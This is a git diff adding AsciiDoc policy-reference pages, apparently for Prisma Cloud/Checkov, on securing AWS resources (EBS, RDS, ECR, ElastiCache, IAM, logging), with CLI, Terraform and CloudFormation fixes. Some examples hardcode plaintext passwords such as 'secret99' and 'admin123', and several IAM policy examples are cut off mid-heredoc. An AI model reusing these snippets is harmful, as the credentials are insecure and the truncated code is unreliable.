+ PointInTimeRecoverySpecification: ++ PointInTimeRecoveryEnabled: true", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/general-7.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/general-7.adoc new file mode 100644 index 000000000..e63efa041 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/general-7.adoc @@ -0,0 +1,97 @@ +== Not all data stored in the EBS snapshot is securely encrypted + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1757fd25-6c31-4c7a-9899-8838150e108f + +|Checkov Check ID +|CKV_AWS_CUSTOM_3 + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +EBS snapshots must be encrypted, as they often include sensitive information, customer PII or CPNI. +Amazon EBS encryption uses AWS Key Management Service (AWS KMS) customer master keys (CMK) when creating encrypted volumes and snapshots. +With EBS encryption enabled, you no longer have to build, maintain, and secure your own key management infrastructure. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To change the policy using the AWS Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the * https://console.aws.amazon.com/ec2/ [Amazon EC2 console]*. + +. From the navigation bar, select * Region*. + +. From the navigation pane, select * EC2 Dashboard*. + +. In the upper-right corner of the page, click * Account Attributes*, then * EBS encryption*. + +. click * Manage*. + +. For Default encryption key, select a symmetric customer managed CMK. + +. Click * Update EBS encryption*. 
+
+
+*CLI Command*
+
+
+To enable EBS encryption by default:
+
+
+[source,shell]
+----
+aws ec2 enable-ebs-encryption-by-default
+----
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_ebs_snapshot
+* *Arguments:* encrypted - Whether the snapshot is encrypted.
+
+Example fix:
+
+
+[source,go]
+----
+resource "aws_ebs_snapshot" "example" {
+  volume_id = "${aws_ebs_volume.example.id}"
++ encrypted = true
+  ...
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/general-73.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/general-73.adoc
new file mode 100644
index 000000000..ddeb986ca
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/general-73.adoc
@@ -0,0 +1,123 @@
+== RDS instances do not have Multi-AZ enabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| a846ac6b-0606-4d1f-993d-622f8e5e2ad6
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSMultiAZEnabled.py[CKV_AWS_157]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+Amazon RDS Multi-AZ deployments provide enhanced availability for databases within a single region.
+In the event of a planned or unplanned outage of your DB instance, Amazon RDS automatically switches to a standby replica in another Availability Zone if you have enabled Multi-AZ.
+RDS Multi-AZ deployments offer the following benefits:
+
+. Enhanced durability.
+
+. Increased availability.
+
+. Protection of your database performance.
+
+. Automatic failover.
+
+////
+=== Fix - Runtime
+
+
+*AWS Console*
+
+
+
+. Log in to the AWS Management Console at https://console.aws.amazon.com/.
+
+. Open the *https://console.aws.amazon.com/rds/[Amazon RDS console]*.
+
+.
To create a new Multi-AZ deployment using the AWS Management Console, click the "Yes" option for "Multi-AZ Deployment" when launching a DB Instance.
+
+. To convert an existing Single-AZ DB Instance to a Multi-AZ deployment, use the "Modify" option corresponding to your DB Instance in the AWS Management Console.
+
+
+*CLI Command*
+
+
+If you use the `create-db-instance` AWS CLI command to create a Multi-AZ DB instance, set the `--multi-az` parameter to `true`.
+If you use the CreateDBInstance API operation, set the `MultiAZ` parameter to `true`.
+You can't set the `AvailabilityZone` parameter if the DB instance is a Multi-AZ deployment.
+
+
+[source,shell]
+----
+aws rds create-db-instance \
+    --db-instance-identifier test-mysql-instance \
+    --db-instance-class db.t3.micro \
+    --engine mysql \
+    --master-username admin \
+    --master-user-password secret99 \
+    --allocated-storage 20 \
+    --multi-az
+----
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_db_instance
+* *Arguments:* multi_az - Specifies if the RDS instance is Multi-AZ.
+
+
+[source,go]
+----
+resource "aws_db_instance" "default" {
+  ...
+  name = "mydb"
++ multi_az = true
+}
+----
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::RDS::DBInstance
+* *Arguments:* Properties.MultiAZ
+
+
+[source,yaml]
+----
+{
+ "Resources:
+ MyDBEnabled:
+ Type: 'AWS::RDS::DBInstance'
+ Properties:
+ ...
++ MultiAZ: true", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/general-8.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/general-8.adoc new file mode 100644 index 000000000..82ff279f3 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/general-8.adoc @@ -0,0 +1,116 @@ +== ECR image scan on push is not enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f77154ed-b9d4-4cf5-ae49-5b0ac9d0bd81 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ECRImageScanning.py[CKV_AWS_163] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Amazon ECR is a fully managed container registry used to store, manage and deploy container images. +ECR Image Scanning assesses and identifies operating system vulnerabilities. +Using automated image scans you can ensure container image vulnerabilities are found before getting pushed to production. +ECR APIs notify if vulnerabilities were found when a scan completes. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To change the policy using the AWS Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the * https://console.aws.amazon.com/ecr/repositories [Amazon ECR console]*. + +. Select a repository using the radio button. + +. Click * Edit*. + +. Enable the * Scan on push* toggle. 
+
+
+*CLI Command*
+
+
+To create a repository configured for *scan on push*:
+
+
+[source,shell]
+----
+aws ecr create-repository \
+--repository-name name \
+--image-scanning-configuration scanOnPush=true \
+--region us-east-2
+----
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_ecr_repository
+* *Arguments:* scan_on_push - (Required) Indicates whether images are scanned after being pushed to the repository (true) or not scanned (false).
+
+
+[source,go]
+----
+resource "aws_ecr_repository" "example" {
+  ...
+  image_tag_mutability = "MUTABLE"
++ image_scanning_configuration {
++   scan_on_push = true
++ }
+  ...
+}
+----
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::ECR::Repository
+* *Arguments:* Properties.ImageScanningConfiguration.ScanOnPush - (Required) Indicates whether images are scanned after being pushed to the repository (true) or not scanned (false).
+
+
+[source,yaml]
+----
+{
+ "Resources:
+ ImageScanTrue:
+ Type: AWS::ECR::Repository
+ Properties:
+ ...
++ ImageScanningConfiguration: ++ ScanOnPush: true", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/general-9.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/general-9.adoc new file mode 100644 index 000000000..88a88fc74 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/general-9.adoc @@ -0,0 +1,117 @@ +== AWS ElastiCache Redis cluster with encryption for data at rest disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 884954a8-d886-4d58-a814-7fda27936166 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py[CKV_AWS_29] + +|Severity +|MEDIUM + +|Subtype +|Build +//,Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +ElastiCache for Redis offers default encryption at rest as a service, as well as the ability to use your own symmetric customer-managed customer master keys in AWS Key Management Service (KMS). + +ElastiCache for Redis at-rest encryption encrypts the following aspects: + +* Disk during sync, backup and swap operations +* Backups stored in Amazon S3 + +//// +=== Fix - Runtime + + +* ElastiCache Console To create a replication group using the * ElastiCache console*, make the following selections:* + + + +. Engine: redis. + +. Engine version: 3.2.6, 4.0.10 or later. + +. Encryption at-rest list: Yes. + + +* CLI Command* + + +The following operation creates the Redis (cluster mode disabled) replication group my-classic-rg with three nodes (--num-cache-clusters), a primary and two read replicas. +At-rest encryption is enabled for this replication group (--at-rest-encryption-enabled). 
+
+
+[source,shell]
+----
+aws elasticache create-replication-group \
+    --replication-group-id my-classic-rg \
+    --replication-group-description "3 node replication group" \
+    --cache-node-type cache.m4.large \
+    --engine redis \
+    --engine-version 4.0.10 \
+    --at-rest-encryption-enabled \
+    --num-cache-clusters 3 \
+    --cache-parameter-group default.redis4.0
+----
+
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_elasticache_replication_group
+* *Arguments:* at_rest_encryption_enabled - (Optional) Whether to enable encryption at rest.
+
+
+[source,go]
+----
+resource "aws_elasticache_replication_group" "default" {
+  ...
+  replication_group_id = "default-1"
++ at_rest_encryption_enabled = true
+  ...
+}
+----
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::ElastiCache::ReplicationGroup
+* *Arguments:* AtRestEncryptionEnabled
+
+
+[source,yaml]
+----
+Resources:
+ ReplicationGroup:
+ Type: 'AWS::ElastiCache::ReplicationGroup'
+ Properties:
+ ...
++ AtRestEncryptionEnabled: True +---- diff --git a/code-security/policy-reference/aws-policies/aws-iam-policies/aws-iam-policies.adoc b/code-security/policy-reference/aws-policies/aws-iam-policies/aws-iam-policies.adoc new file mode 100644 index 000000000..1319462d4 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-iam-policies/aws-iam-policies.adoc @@ -0,0 +1,159 @@ +== AWS IAM Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-aws-iam-43.adoc[AWS IAM policy documents do not allow * (asterisk) as a statement's action] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/data/aws/StarActionPolicyDocument.py[CKV_AWS_49] +|HIGH + + +|xref:bc-aws-iam-44.adoc[AWS IAM role allows all services or principals to be assumed] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/IAMRoleAllowsPublicAssume.py[CKV_AWS_60] +|HIGH + + +|xref:bc-aws-iam-45.adoc[AWS IAM policy does allow assume role permission across all services] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/IAMRoleAllowAssumeFromAccount.py[CKV_AWS_61] +|HIGH + + +|xref:bc-aws-iam-46.adoc[AWS SQS queue access policy is overly permissive] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SQSPolicy.py[CKV_AWS_72] +|HIGH + + +|xref:ensure-an-iam-role-is-attached-to-ec2-instance.adoc[AWS EC2 Instance IAM Role not enabled] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EC2InstanceHasIAMRoleAttached.yaml[CKV2_AWS_41 ] +|MEDIUM + + +|xref:ensure-an-iam-user-does-not-have-access-to-the-console-group.adoc[IAM User has access to the console] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUserHasNoConsoleAccess.yaml[CKV2_AWS_22] +|MEDIUM + + 
+|xref:ensure-aws-cloudfromt-distribution-with-s3-have-origin-access-set-to-enabled.adoc[AWS Cloudfront Distribution with S3 have Origin Access set to disabled] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CLoudFrontS3OriginConfigWithOAI.yaml[CKV2_AWS_46] +|MEDIUM + + +|xref:ensure-iam-policies-do-not-allow-credentials-exposure.adoc[Credentials exposure actions return credentials in an API response] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py[CKV_AWS_107] +|LOW + + +|xref:ensure-iam-policies-do-not-allow-data-exfiltration.adoc[Data exfiltration allowed without resource constraints] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/data/aws/IAMDataExfiltration.py[CKV_AWS_108] +|LOW + + +|xref:ensure-iam-policies-do-not-allow-permissions-management-resource-exposure-without-constraint.adoc[Resource exposure allows modification of policies and exposes resources] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py[CKV_AWS_109] +|LOW + + +|xref:ensure-iam-policies-do-not-allow-write-access-without-constraint.adoc[Write access allowed without constraint] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/data/aws/IAMWriteAccess.py[CKV_AWS_111] +|LOW + + +|xref:ensure-iam-policies-does-not-allow-privilege-escalation.adoc[IAM policies allow privilege escalation] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py[CKV_AWS_110] +|MEDIUM + + +|xref:ensure-kms-key-policy-does-not-contain-wildcard-principal.adoc[AWS KMS Key policy overly permissive] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/KMSKeyWildcardPrincipal.py[CKV_AWS_33] +|HIGH + + +|xref:ensure-rds-cluster-has-iam-authentication-enabled.adoc[AWS RDS cluster 
not configured with IAM authentication] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/RDSClusterIAMAuthentication.py[CKV_AWS_162] +|MEDIUM + + +|xref:ensure-rds-database-has-iam-authentication-enabled.adoc[RDS database does not have IAM authentication enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/RDSIAMAuthentication.py[CKV_AWS_161] +|MEDIUM + + +|xref:ensure-s3-bucket-does-not-allow-access-to-all-authenticated-users.adoc[AWS S3 buckets are accessible to any authenticated user] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3NotAllowAccessToAllAuthenticatedUsers.yaml[CKV2_AWS_43] +|HIGH + + +|xref:ensure-that-all-iam-users-are-members-of-at-least-one-iam-group.adoc[Not all IAM users are members of at least one IAM group] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUsersAreMembersAtLeastOneGroup.yaml[CKV2_AWS_21] +|LOW + + +|xref:ensure-that-an-amazon-rds-clusters-have-iam-authentication-enabled.adoc[IAM authentication for Amazon RDS clusters is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSEnableIAMAuthentication.py[CKV_AWS_128] +|LOW + + +|xref:ensure-that-iam-groups-include-at-least-one-iam-user.adoc[IAM groups do not include at least one IAM user] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml[CKV2_AWS_14] +|LOW + + +|xref:ensure-that-respective-logs-of-amazon-relational-database-service-amazon-rds-are-enabled.adoc[Respective logs of Amazon RDS are disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DBInstanceLogging.py[CKV_AWS_129] +|LOW + + +|xref:iam-10.adoc[AWS IAM password policy does allow password reuse] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/PasswordPolicyReuse.py[CKV_AWS_13] +|HIGH + + +|xref:iam-11.adoc[AWS IAM password policy does not expire in 90 days] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/PasswordPolicyExpiration.py[CKV_AWS_9] +|MEDIUM + +|xref:iam-16-iam-policy-privileges-1.adoc[AWS IAM policy attached to users] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py[CKV_AWS_40] +|LOW + + + +|xref:iam-23.adoc[AWS IAM policies that allow full administrative privileges are created] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/serverless/checks/function/aws/AdminPolicyDocument.py[CKV_AWS_1] +|LOW + + + +|xref:iam-48.adoc[AWS IAM policy documents allow * (asterisk) as a statement's action] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py[CKV_AWS_63] +|HIGH + + +|xref:iam-5.adoc[AWS IAM password policy does not have an uppercase character] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/PasswordPolicyUppercaseLetter.py[CKV_AWS_15] +|MEDIUM + +|xref:iam-6.adoc[AWS IAM password policy does not have a lowercase character] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/PasswordPolicyLowercaseLetter.py[CKV_AWS_11] +|MEDIUM + + +|xref:iam-7.adoc[AWS IAM password policy does not have a symbol] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/PasswordPolicySymbol.py[CKV_AWS_14] +|MEDIUM + + +|xref:iam-8.adoc[AWS IAM password policy does not have a number] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/PasswordPolicyNumber.py[CKV_AWS_12] +|MEDIUM + + +|xref:iam-9-1.adoc[AWS IAM password policy does not have a minimum of 14 
characters] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/PasswordPolicyLength.py[CKV_AWS_10] +|MEDIUM + + +|=== + diff --git a/code-security/policy-reference/aws-policies/aws-iam-policies/bc-aws-iam-43.adoc b/code-security/policy-reference/aws-policies/aws-iam-policies/bc-aws-iam-43.adoc new file mode 100644 index 000000000..80d2ab73f --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-iam-policies/bc-aws-iam-43.adoc @@ -0,0 +1,89 @@ +== AWS IAM policy documents do not allow * (asterisk) as a statement's action + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 663ffb0a-4219-41ba-b72c-53aa9c694f5b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/data/aws/StarActionPolicyDocument.py[CKV_AWS_49] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,Serverless,TerraformPlan + +|=== + + + +=== Description + + +The Action element describes the specific action or actions that will be allowed or denied. +Statements must include either an Action or NotAction element. +Each AWS service has its own set of actions that describe tasks that can be performed with that service. +Specify a value using a namespace that identifies a service, for example, iam, ec2, sqs, sns, or s3, followed by the name of the action to be allowed or denied. +The name must match an action that is supported by the service. +We recommend you do not allow "*" (all actions) statements as part of action elements. +This level of access could potentially grant unwanted and unregulated access to anyone given this policy document setting. +We recommend you write a refined policy describing the specific actions allowed or required by the policy holder. + +//// +=== Fix - Runtime + + +*AWS Console* + + + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. 
Open the https://console.aws.amazon.com/iam/[Amazon IAM console]. + +. In the navigation pane, choose *Policies*. + +. In the list of policies, choose the policy name of the policy to edit. ++ +You can use the Filter menu and the search box to filter the list of policies. + +. Choose the *Permissions* tab, then choose *Edit Policy*. + +. Identify any Action statements that permit all actions ("*"). + +. On the Review page, review the policy Summary, then click *Save Changes*. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Arguments:* statement +* *Attribute*: action + +Example fix: + + +[source,go] +---- +resource "aws_iam_policy" "example" { + # ... other configuration ... + policy = < +---- + +. Detach the policy from all IAM Users. +[,bash] +---- +aws iam detach-user-policy --user-name <iam_user> --policy-arn <policy_arn> +---- +. Detach the policy from all IAM Groups. +[,bash] +---- +aws iam detach-group-policy --group-name <iam_group> --policy-arn <policy_arn> +---- +. Detach the policy from all IAM Roles. +[,bash] +---- +aws iam detach-role-policy --role-name <iam_role> --policy-arn <policy_arn> +---- +//// + +=== Fix - Buildtime + +*Terraform* + +* *Resource:* aws_iam_policy + + + + +[source,go] +---- +resource "aws_iam_policy" "pass1" { + name = "pass1" + path = "/" + policy = <` + +. Detach the policy from all IAM Users: ++ +`aws iam detach-user-policy --user-name <iam_user> --policy-arn <policy_arn>` + +. Detach the policy from all IAM Groups: ++ +`aws iam detach-group-policy --group-name <iam_group> --policy-arn <policy_arn>` + +. Detach the policy from all IAM Roles: ++ +`aws iam detach-role-policy --role-name <iam_role> --policy-arn <policy_arn>` +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_iam_policy +* *Arguments:* policy - (Required) The policy document. + +This is a JSON formatted string. 
+For more information about building AWS IAM policy documents with Terraform, see the AWS IAM Policy Document Guide. + + +[source,go] +---- +resource "aws_iam_policy" "policy" { + name = "test_policy" + path = "/" + description = "My test policy" + + policy = < ++ SourceSecurityGroups: ++ - ... + + Nodegroup2: + Type: 'AWS::EKS::Nodegroup' + Properties: + ... +- RemoteAccess: +- ... +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/aws-logging-policies.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/aws-logging-policies.adoc new file mode 100644 index 000000000..8511b697d --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/aws-logging-policies.adoc @@ -0,0 +1,140 @@ +== AWS Logging Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-aws-logging-10.adoc[Amazon MQ Broker logging is not enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MQBrokerLogging.py[CKV_AWS_48] +|MEDIUM + + +|xref:bc-aws-logging-11.adoc[AWS ECS cluster with container insights feature disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ECSClusterContainerInsights.py[CKV_AWS_65] +|LOW + + +|xref:bc-aws-logging-12.adoc[AWS Redshift database does not have audit logging enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RedshiftClusterLogging.py[CKV_AWS_71] +|MEDIUM + + +|xref:bc-aws-logging-22.adoc[AWS Elastic Load Balancer v2 (ELBv2) with access log disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py[CKV_AWS_91] +|MEDIUM + + +|xref:bc-aws-logging-23.adoc[AWS Elastic Load Balancer (Classic) with access log disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ELBAccessLogs.py[CKV_AWS_92] +|MEDIUM 
+ + +|xref:bc-aws-logging-24.adoc[Neptune logging is not enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/NeptuneClusterLogging.py[CKV_AWS_101] +|HIGH + + + +|xref:bc-aws-logging-31.adoc[AWS WAF Web Access Control Lists logging is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/WAFHasLogs.py[CKV_AWS_176] +|LOW + + +|xref:bc-aws-logging-33.adoc[AWS WAF2 does not have a Logging Configuration] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/WAF2HasLogs.yaml[CKV2_AWS_31] +|LOW + + +|xref:ensure-api-gateway-stage-have-logging-level-defined-as-appropiate.adoc[API Gateway stage does not have logging level defined appropriately] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml[CKV2_AWS_4] +|LOW + + +|xref:ensure-cloudtrail-trails-are-integrated-with-cloudwatch-logs.adoc[CloudTrail trail is not integrated with CloudWatch Log] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudtrailHasCloudwatch.yaml[CKV2_AWS_10] +|MEDIUM + + +|xref:ensure-that-cloudformation-stacks-are-sending-event-notifications-to-an-sns-topic.adoc[AWS CloudFormation stack configured without SNS topic] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudformationStackNotificationArns.py[CKV_AWS_124] +|LOW + + +|xref:ensure-that-detailed-monitoring-is-enabled-for-ec2-instances.adoc[AWS EC2 instance detailed monitoring disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EC2DetailedMonitoringEnabled.py[CKV_AWS_126] +|MEDIUM + + +|xref:ensure-that-enhanced-monitoring-is-enabled-for-amazon-rds-instances.adoc[AWS Amazon RDS instances Enhanced Monitoring is disabled] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/RDSEnhancedMonitorEnabled.py[CKV_AWS_118] +|LOW + + +|xref:logging-1.adoc[AWS CloudTrail is not enabled with multi trail and not capturing all management events] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudtrailMultiRegion.py[CKV_AWS_67] +|LOW + + +|xref:logging-13.adoc[AWS CloudWatch Log groups not configured with definite retention days] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupRetention.py[CKV_AWS_66] +|LOW + + + +|xref:logging-15.adoc[API Gateway does not have X-Ray tracing enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayXray.py[CKV_AWS_73] +|LOW + + +|xref:logging-16.adoc[Global Accelerator does not have Flow logs enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/GlobalAcceleratorAcceleratorFlowLogs.py[CKV_AWS_75] +|LOW + + +|xref:logging-17.adoc[API Gateway does not have access logging enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/APIGatewayAccessLogging.py[CKV_AWS_76] +|LOW + + +|xref:logging-18.adoc[Amazon MSK cluster logging is not enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MSKClusterLogging.py[CKV_AWS_80] +|MEDIUM + + +|xref:logging-19.adoc[AWS DocumentDB logging is not enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/DocDBLogging.py[CKV_AWS_85] +|MEDIUM + + +|xref:logging-2.adoc[AWS CloudTrail log validation is not enabled in all regions] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudtrailLogValidation.py[CKV_AWS_36] +|LOW + + +|xref:logging-20.adoc[AWS CloudFront distribution with access 
logging disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudfrontDistributionLogging.py[CKV_AWS_86] +|MEDIUM + +|xref:logging-5-enable-aws-config-regions.adoc[AWS config is not enabled in all regions] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ConfigConfgurationAggregatorAllRegions.py[CKV_AWS_121] +|MEDIUM + + +|xref:logging-7.adoc[AWS CloudTrail logs are not encrypted using Customer Master Keys (CMKs)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/CloudtrailEncryption.py[CKV_AWS_35] +|MEDIUM + + +|xref:logging-8.adoc[AWS Customer Master Key (CMK) rotation is not enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/KMSRotation.py[CKV_AWS_7] +|MEDIUM + + +|xref:logging-9-enable-vpc-flow-logging.adoc[AWS VPC Flow Logs not enabled] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasFlowLog.yaml[CKV2_AWS_11] +|MEDIUM + + +|=== + diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-10.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-10.adoc new file mode 100644 index 000000000..dd7b58f04 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-10.adoc @@ -0,0 +1,68 @@ +== Amazon MQ Broker logging is not enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| bbb2b85f-e78c-4202-8f45-7eb40d177b8c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MQBrokerLogging.py[CKV_AWS_48] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Amazon MQ is a broker service built on Apache ActiveMQ. 
As a message broker, MQ allows applications to communicate using various programming languages, operating systems, and formal messaging protocols. +Amazon MQ is integrated with CloudTrail and provides a record of the Amazon MQ calls made by a user, role, or AWS service. +It supports logging both the request parameters and the responses for APIs as events in CloudTrail. +Logging MQ brokers ensures developers can trace all requests and responses, and ensure they are only used for their predefined message brokering settings. +We recommend you enable Amazon MQ Broker Logging. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +resource "aws_mq_broker" "enabled" { + broker_name = "example" + engine_type = "ActiveMQ" + engine_version = "5.16.3" + host_instance_type = "mq.t3.micro" + + user { + password = "admin123" + username = "admin" + } + + + logs { + general = true + } + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-11.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-11.adoc new file mode 100644 index 000000000..a52324d65 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-11.adoc @@ -0,0 +1,115 @@ +== AWS ECS cluster with container insights feature disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ad3524a5-6f8f-4eab-9bd1-2a53850070db + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ECSClusterContainerInsights.py[CKV_AWS_65] + +|Severity 